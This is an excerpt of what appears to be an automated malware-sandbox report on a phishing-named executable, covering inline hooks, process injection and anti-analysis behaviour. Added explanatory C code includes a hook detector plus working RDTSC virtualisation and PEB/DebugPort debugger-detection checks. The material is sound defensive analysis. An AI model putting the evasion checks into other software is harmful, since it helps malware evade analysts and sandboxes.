          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041CF02 push eax; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0041CF0B push eax; ret
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0103D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04C7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03099B8D pushfd ; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A7B8E push edi; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A6A8A pushfd ; retf
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A9AD3 push edx; iretd
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A78B3 push edi; iretd
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030ACF0B push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030ACF02 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030ACF6C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A667E push edx; iretd
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030ACEB5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_030A9DB2 push es; iretd
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_0309E42C push ss; iretd
          Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_03094443 push 0000007Bh; iretd
          Source: initial sample | Static PE information: section name: .text entropy: 7.45974448722
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | File created: \payment transfer copy of $274,876.00 for the invoice shipments.exe

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xEA
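The PeekMessageA finding above is an inline hook: the first bytes of the exported function inside explorer.exe no longer match what the loader mapped from user32.dll. What follows is an added example of the check that produces such a finding, written for this page and not taken from the report, from Joe Sandbox or from the sample: compare the live prolog bytes against a clean reference and, when they differ, decode the patch as one of the common 32-bit trampolines so the hook target can be reported. Every input is constructed except the six "new code" bytes quoted in the report, which do not match any plain trampoline; the checker therefore reports them as an unrecognised patch instead of ignoring them, which is the case a real scanner must handle. The virtual address and the reference prolog (a typical mov edi,edi; push ebp; mov ebp,esp hot-patch prolog) are assumed values; on a live system the reference bytes come from the on-disk user32.dll relocated to the same base.

```c
/* Added example: inline-hook prolog check (constructed data, not the sample's code). */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef enum {
    HOOK_NONE,             /* prolog matches the reference copy          */
    HOOK_JMP_REL32,        /* E9 rel32                                    */
    HOOK_JMP_ABS_INDIRECT, /* FF 25 [abs32]: jump through a pointer slot  */
    HOOK_PUSH_RET,         /* 68 imm32; C3                                */
    HOOK_UNKNOWN_PATCH     /* bytes changed but no recognised trampoline  */
} hook_kind;

typedef struct {
    hook_kind kind;
    uint32_t  target;  /* branch target (or pointer slot), 0 if unknown */
} hook_report;

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Decode the first bytes of a function at virtual address va that are known to differ. */
hook_report classify_patch(uint32_t va, const uint8_t *code, size_t len)
{
    hook_report r = { HOOK_UNKNOWN_PATCH, 0 };
    if (len >= 5 && code[0] == 0xE9) {
        r.kind   = HOOK_JMP_REL32;
        r.target = va + 5 + rd32le(code + 1);   /* uint32 wrap-around == 32-bit EIP arithmetic */
    } else if (len >= 6 && code[0] == 0xFF && code[1] == 0x25) {
        r.kind   = HOOK_JMP_ABS_INDIRECT;
        r.target = rd32le(code + 2);            /* address of the pointer slot, not the hook */
    } else if (len >= 6 && code[0] == 0x68 && code[5] == 0xC3) {
        r.kind   = HOOK_PUSH_RET;
        r.target = rd32le(code + 1);
    }
    return r;
}

/* Compare n live bytes against the reference; classify only when they differ. */
hook_report check_prolog(uint32_t va, const uint8_t *reference,
                         const uint8_t *live, size_t n)
{
    if (memcmp(reference, live, n) == 0) {
        hook_report clean = { HOOK_NONE, 0 };
        return clean;
    }
    return classify_patch(va, live, n);
}

/* Constructed inputs. The address and the reference prolog are assumed values;
 * PEEKMESSAGEA_LIVE is the "new code" quoted in the report. */
#define PEEKMESSAGEA_VA 0x76A3A1F0u
const uint8_t PEEKMESSAGEA_REF[6]  = { 0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x83 }; /* mov edi,edi; push ebp; mov ebp,esp; ... */
const uint8_t PEEKMESSAGEA_LIVE[6] = { 0x48, 0x8B, 0xB8, 0x82, 0x2E, 0xEA }; /* bytes from the report           */
const uint8_t SAMPLE_JMP_REL32[6]  = { 0xE9, 0x00, 0x00, 0x01, 0x00, 0x90 }; /* constructed: jmp +0x10000        */
const uint8_t SAMPLE_PUSH_RET[6]   = { 0x68, 0x78, 0x56, 0x34, 0x12, 0xC3 }; /* constructed: push 0x12345678; ret */

static const char *kind_name(hook_kind k)
{
    static const char *names[] = { "clean", "jmp rel32", "jmp [abs32]",
                                   "push/ret", "unknown patch" };
    return names[k];
}

int main(void)
{
    const struct { const char *name; const uint8_t *live; } cases[] = {
        { "PeekMessageA (report bytes)",          PEEKMESSAGEA_LIVE },
        { "PeekMessageA (constructed jmp)",       SAMPLE_JMP_REL32  },
        { "PeekMessageA (constructed push/ret)",  SAMPLE_PUSH_RET   },
        { "PeekMessageA (unmodified)",            PEEKMESSAGEA_REF  },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        hook_report r = check_prolog(PEEKMESSAGEA_VA, PEEKMESSAGEA_REF, cases[i].live, 6);
        printf("%-38s %-14s target=0x%08X\n", cases[i].name, kind_name(r.kind), (unsigned)r.target);
    }
    return 0;
}
```

check_prolog returns the decoded kind and target, so the same routine can sit behind a scanner that reads the live bytes of every export with ReadProcessMemory and takes the reference from the module file on disk; anything flagged HOOK_UNKNOWN_PATCH deserves a manual look rather than being dropped as noise.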
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match | File source: 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe PID: 6512, type: MEMORY
Source: Yara match | File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.2a94cf8.1.raw.unpack, type: UNPACKEDPE
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 00000000030998E4 second address: 00000000030998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe | RDTSC instruction interceptor: First address: 0000000003099B5E second address: 0000000003099B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00409A90 rdtsc
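The interceptor entries above show the sample's timing probe: two rdtsc reads separated only by xor ecx, ecx / add ecx, eax, so the low 32 bits of the counter are parked in ecx and the counter is read again. What follows is an added example (not from the report, not from Joe Sandbox and not the sample's own code) that implements that probe as a function. Two back-to-back rdtsc reads cost a few dozen cycles on bare metal; a hypervisor that traps rdtsc, or a debugger single-stepping through the sequence, inflates the delta by orders of magnitude. The threshold is an assumed value, the minimum over many rounds guards against a scheduler pre-emption landing between the two reads, and the non-x86 fallback uses clock_gettime only so the file still builds there.

```c
/* Added example: rdtsc/rdtsc timing probe as seen in the interceptor entries. */
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* One probe, mirroring the sample's sequence:
 *   rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc ; sub eax,ecx
 * Only the low 32 bits are used, wrap-around included, exactly as the sample does. */
static uint32_t rdtsc_delta_once(void)
{
    uint32_t delta;
#if defined(__i386__) || defined(__x86_64__)
    __asm__ __volatile__(
        "rdtsc\n\t"
        "xor %%ecx, %%ecx\n\t"
        "add %%eax, %%ecx\n\t"
        "rdtsc\n\t"
        "sub %%ecx, %%eax\n\t"
        : "=a"(delta)
        :
        : "ecx", "edx", "cc");
#else
    /* Non-x86 fallback so the example still builds: nanoseconds instead of cycles. */
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    clock_gettime(CLOCK_MONOTONIC, &b);
    delta = (uint32_t)((long long)(b.tv_sec - a.tv_sec) * 1000000000LL +
                       (long long)(b.tv_nsec - a.tv_nsec));
#endif
    return delta;
}

/* Smallest delta over `rounds` probes (UINT32_MAX if rounds <= 0). Taking the
 * minimum discards rounds in which the thread was pre-empted between the reads. */
uint32_t min_rdtsc_delta(int rounds)
{
    uint32_t best = UINT32_MAX;
    for (int i = 0; i < rounds; i++) {
        uint32_t d = rdtsc_delta_once();
        if (d < best)
            best = d;
    }
    return best;
}

/* 1 when the delta exceeds the threshold (counter trapped or emulated), else 0. */
int classify_delta(uint32_t delta, uint32_t threshold)
{
    return delta > threshold;
}

#define ASSUMED_THRESHOLD 500u  /* cycles; an assumed value, tune per CPU model */

int main(void)
{
    uint32_t d = min_rdtsc_delta(1000);
    printf("min rdtsc delta over 1000 rounds: %u -> %s\n", (unsigned)d,
           classify_delta(d, ASSUMED_THRESHOLD) ? "looks virtualised/trapped" : "looks native");
    return 0;
}
```

Sandboxes defeat this class of probe by letting rdtsc pass through unconditionally or by keeping the offset between trapped reads small; a counter that advances in large constant steps between consecutive reads is itself a tell, so emulated TSC values should add jitter in the native range rather than a fixed increment.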
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe TID: 6516 | Thread sleep time: -99992s >= -30000s
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe TID: 6532 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 5480 | Thread sleep count: 84 > 30
Source: C:\Windows\explorer.exe TID: 5480 | Thread sleep time: -168000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3868 | Thread sleep count: 36 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3868 | Thread sleep time: -180000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.259257447.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000005.00000000.251785996.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000005.00000000.259445531.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.259520617.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000005.00000002.755874779.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.258945379.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00409A90 rdtsc
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0040ACD0 LdrLoadDll,
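Two things are worth separating in the evasion evidence above. The Hyper-V messages and SCSI device identifiers attributed to explorer.exe memory are most likely the analysis VM's own state present in the injected process, not strings the sample references; the indicators the loader itself carries are the ones found in the sample's memory (SBIEDLL.DLL for Sandboxie, KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME for Wine, the VMware Tools install path and registry key, the VMware SVGA II adapter name). The DebugPort queries, together with the long run of mov eax, dword ptr fs:[00000030h] reads listed after this point, are the sample touching the PEB. What follows is an added example (not from the report, not from Joe Sandbox and not the sample's own code) of the checks such reads normally implement: PEB.BeingDebugged, the debugger heap flags in PEB.NtGlobalFlag, and NtQueryInformationProcess(ProcessDebugPort). The decoding functions take a raw 32-bit PEB image so they can be exercised on constructed data on any platform; the 32-bit Windows build reads the real PEB through NtCurrentTeb() (the same slot fs:[0x30] points at) and queries the debug port, and must be linked against ntdll.lib. The 0x68 offset is the 32-bit NtGlobalFlag location; the 64-bit PEB keeps it at 0xBC.

```c
/* Added example: the PEB and DebugPort anti-debugging checks (constructed PEB images). */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PEB32_BEING_DEBUGGED 0x02   /* BYTE  PEB.BeingDebugged                        */
#define PEB32_NTGLOBALFLAG   0x68   /* ULONG PEB.NtGlobalFlag (0xBC in the 64-bit PEB) */
#define PEB32_IMAGE_SIZE     0x100  /* constructed images only need these two fields  */

/* Heap flags the loader turns on when a process is created under a debugger. */
#define FLG_HEAP_ENABLE_TAIL_CHECK   0x10u
#define FLG_HEAP_ENABLE_FREE_CHECK   0x20u
#define FLG_HEAP_VALIDATE_PARAMETERS 0x40u
#define DEBUGGER_HEAP_FLAGS (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | \
                             FLG_HEAP_VALIDATE_PARAMETERS)

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* PEB.BeingDebugged is what IsDebuggerPresent() returns; trivial to clear, so rarely checked alone. */
int peb32_being_debugged(const uint8_t *peb)
{
    return peb[PEB32_BEING_DEBUGGED] != 0;
}

/* PEB.NtGlobalFlag keeps the debugger heap flags even after BeingDebugged was patched to 0. */
int peb32_ntglobalflag_debugged(const uint8_t *peb)
{
    return (rd32le(peb + PEB32_NTGLOBALFLAG) & DEBUGGER_HEAP_FLAGS) == DEBUGGER_HEAP_FLAGS;
}

/* A non-zero ProcessDebugPort means a debugger is attached right now. */
int debugger_detected(const uint8_t *peb, uint32_t debug_port)
{
    return peb32_being_debugged(peb) || peb32_ntglobalflag_debugged(peb) || debug_port != 0;
}

/* Build a constructed 32-bit PEB image with the two fields of interest and evaluate it. */
int check_constructed(int being_debugged, uint32_t nt_global_flag, uint32_t debug_port)
{
    uint8_t peb[PEB32_IMAGE_SIZE];
    memset(peb, 0, sizeof peb);
    peb[PEB32_BEING_DEBUGGED]   = (uint8_t)(being_debugged != 0);
    peb[PEB32_NTGLOBALFLAG + 0] = (uint8_t)(nt_global_flag);
    peb[PEB32_NTGLOBALFLAG + 1] = (uint8_t)(nt_global_flag >> 8);
    peb[PEB32_NTGLOBALFLAG + 2] = (uint8_t)(nt_global_flag >> 16);
    peb[PEB32_NTGLOBALFLAG + 3] = (uint8_t)(nt_global_flag >> 24);
    return debugger_detected(peb, debug_port);
}

#if defined(_WIN32) && !defined(_WIN64)
#include <windows.h>
#include <winternl.h>   /* NtQueryInformationProcess, ProcessDebugPort; link with ntdll.lib */

int main(void)
{
    /* fs:[0x30] holds the PEB pointer; NtCurrentTeb()->ProcessEnvironmentBlock reads the same slot. */
    const uint8_t *peb = (const uint8_t *)NtCurrentTeb()->ProcessEnvironmentBlock;
    DWORD port = 0;   /* DWORD_PTR on 32-bit Windows */
    NtQueryInformationProcess(GetCurrentProcess(), ProcessDebugPort, &port, sizeof port, NULL);
    printf("BeingDebugged=%d NtGlobalFlag=0x%08X DebugPort=0x%08lX -> %s\n",
           peb32_being_debugged(peb), (unsigned)rd32le(peb + PEB32_NTGLOBALFLAG),
           (unsigned long)port,
           debugger_detected(peb, (uint32_t)port) ? "debugger detected" : "no debugger");
    return 0;
}
#else
int main(void)
{
    printf("clean image: %d, BeingDebugged set: %d, NtGlobalFlag=0x70: %d, DebugPort set: %d\n",
           check_constructed(0, 0, 0), check_constructed(1, 0, 0),
           check_constructed(0, 0x70, 0), check_constructed(0, 0, 0xFFFFFFFFu));
    return 0;
}
#endif
```

A debugger plug-in that only clears BeingDebugged is still caught by the NtGlobalFlag test unless it patches that field too, which is why samples read several PEB fields directly instead of calling IsDebuggerPresent; the same direct PEB reads are also how a loader that imports nothing walks PEB.Ldr to find kernel32 and ntdll before calling LdrLoadDll, as the entry above shows this one doing.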
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01004120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01004120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0100B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0100B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FE9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0100C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_0101A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01012990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010669A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010161A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010161A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_00FFB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_010741E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | Code function: 4_2_01067016 mov eax, dword ptr fs:[00000030h]
